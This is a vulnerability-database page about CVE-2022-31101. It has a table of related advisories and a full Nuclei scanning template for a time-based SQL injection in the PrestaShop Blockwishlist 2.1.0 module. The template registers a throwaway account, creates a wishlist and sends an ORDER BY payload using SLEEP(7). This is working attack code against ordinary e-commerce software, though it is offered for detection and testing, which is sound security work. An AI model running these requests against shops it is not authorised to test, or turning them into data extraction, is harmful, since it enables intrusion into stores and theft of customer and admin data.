| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| Prestashop blockwishlist module 2.1.0 - SQL injection Exploit | 9 Aug 202200:00 | – | zdt | |
| Exploit for SQL Injection in Prestashop Blockwishlist | 9 Aug 202210:29 | – | githubexploit | |
| Exploit for SQL Injection in Prestashop Blockwishlist | 24 Jul 202221:50 | – | githubexploit | |
| CVE-2022-31101 | 28 Jun 202202:35 | – | circl | |
| Prestashop SQL注入漏洞 | 27 Jun 202200:00 | – | cnnvd | |
| Prestashop SQL Injection Vulnerability (CNVD-2022-58389) | 30 Jun 202200:00 | – | cnvd | |
| CVE-2022-31101 | 27 Jun 202222:15 | – | cve | |
| CVE-2022-31101 SQL Injection in prestashop/blockwishlist | 27 Jun 202222:15 | – | cvelist | |
| Prestashop blockwishlist module 2.1.0 - SQLi | 9 Aug 202200:00 | – | exploitdb | |
| BlockWishList SQL Injection vulnerability | 25 Jun 202207:11 | – | github |
id: CVE-2022-31101
info:
name: Prestashop Blockwishlist 2.1.0 SQL Injection
author: mastercho
severity: high
description: |
Prestashop Blockwishlist module version 2.1.0 suffers from a remote authenticated SQL injection vulnerability.
impact: |
Authenticated attackers can exploit SQL injection in the Blockwishlist module to extract sensitive database information including customer details, order data, and admin credentials from the PrestaShop database.
remediation: |
Update Prestashop Blockwishlist module to a version newer than 2.1.0 that properly sanitizes user input and uses parameterized queries.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31101
- https://github.com/PrestaShop/blockwishlist/security/advisories/GHSA-2jx3-5j9v-prpp
- https://packetstormsecurity.com/files/168003/Prestashop-Blockwishlist-2.1.0-SQL-Injection.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
cvss-score: 8.1
cve-id: CVE-2022-31101
cwe-id: CWE-89
epss-score: 0.24146
epss-percentile: 0.97579
cpe: cpe:2.3:a:prestashop:blockwishlist:*:*:*:*:*:*:*:*
metadata:
max-request: 8
vendor: prestashop
product: blockwishlist
tags: packetstorm,cve,cve2022,prestashop,prestashop-module,sqli,intrusive
variables:
first_name: "{{rand_base(4, 'abcdefghijklmnopqrstuvwxyz')}}"
last_name: "{{rand_base(4, 'abcdefghijklmnopqrstuvwxyz')}}"
email: "{{randstr}}@{{rand_base(5)}}.com"
password: "{{rand_base(8)}}"
flow: |
http(1) && http(2) && http(3) && http(4) && (template["id_wishlist"] && template["id_wishlist"][0] ? (http(7) && http(8)) : (http(5) && http(6) && http(7) && http(8)))
http:
- method: GET
path:
- "{{BaseURL}}/modules/blockwishlist/config.xml"
extractors:
- type: regex
name: version
group: 1
regex:
- "<version>\\s*<!\\[CDATA\\[(.*?)\\]\\]>\\s*<\\/version>"
host-redirects: true
max-redirects: 3
matchers-condition: and
matchers:
- type: status
status:
- 200
internal: true
- type: word
part: body
words:
- "Wishlist block"
internal: true
- type: dsl
name: version_check
dsl:
- compare_versions(version, '>= 2.0.0', '<= 2.1.0')
internal: true
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 3
extractors:
- type: regex
name: id_product_raw
part: body
group: 1
regex:
- '/(\d+)-[a-z0-9\-]+\.html'
internal: true
- type: dsl
name: id_product
dsl:
- index(id_product_raw, 0)
internal: true
- raw:
- |
POST /{{login_path}}?create_account=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
id_gender=1&firstname={{first_name}}&lastname={{last_name}}&email={{email}}&password={{password}}&birthday=&customer_privacy=1&psgdpr=1&submitCreate=1
payloads:
login_path:
- login
- en/login
- fr/login
- de/login
- pl/login
- es/login
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- regex('PrestaShop-[0-9a-f]{32}', header)
- status_code == 302
condition: and
internal: true
- raw:
- |
GET /module/blockwishlist/action?action=getAllWishlist HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '"id_wishlist"'
- '"nbProducts"'
- '"name"'
condition: and
internal: true
extractors:
- type: json
name: id_wishlist_raw
part: body
json:
- .wishlists[0].id_wishlist
internal: true
- type: dsl
name: id_wishlist
dsl:
- index(id_wishlist_raw, 0)
internal: true
- id: create-wishlist
raw:
- |
GET /module/blockwishlist/action?action=createNewWishlist¶ms[name]=123 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '"success"'
internal: true
- id: fetch-new-wishlist
raw:
- |
GET /module/blockwishlist/action?action=getAllWishlist HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: id_wishlist_raw
part: body
group: 1
regex:
- '"id_wishlist":"(\d+)"'
internal: true
- type: dsl
name: id_wishlist
dsl:
- 'index(id_wishlist_raw, 0)'
internal: true
matchers:
- type: word
part: body
words:
- '"id_wishlist"'
- '"nbProducts"'
- '"name"'
condition: and
internal: true
- id: add-product
raw:
- |
POST /module/blockwishlist/action?action=addProductToWishlist¶ms[id_product]={{id_product}}¶ms[idWishList]={{id_wishlist_raw}}¶ms[quantity]=1¶ms[id_product_attribute]=0 HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '"success":true'
internal: true
- id: sql-inj
raw:
- |
GET /module/blockwishlist/view?id_wishlist={{id_wishlist_raw}}&order=p.name,%20(select%20case%20when%20(1=1)%20then%20(SELECT%20SLEEP(7))%20else%201%20end);%20--%20.asc HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
name: time-based
dsl:
- 'duration >= 7'
- 'contains(to_lower(body), "prestashop")'
condition: and
# digest: 4b0a00483046022100844491054830e27f6b54926dc449d2b6c0a259626aaafac1053689369e35aa9b022100fc998df424a66361e123799ba60097b52114c0b89d164b6ec3c73b60dc2ccf51:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation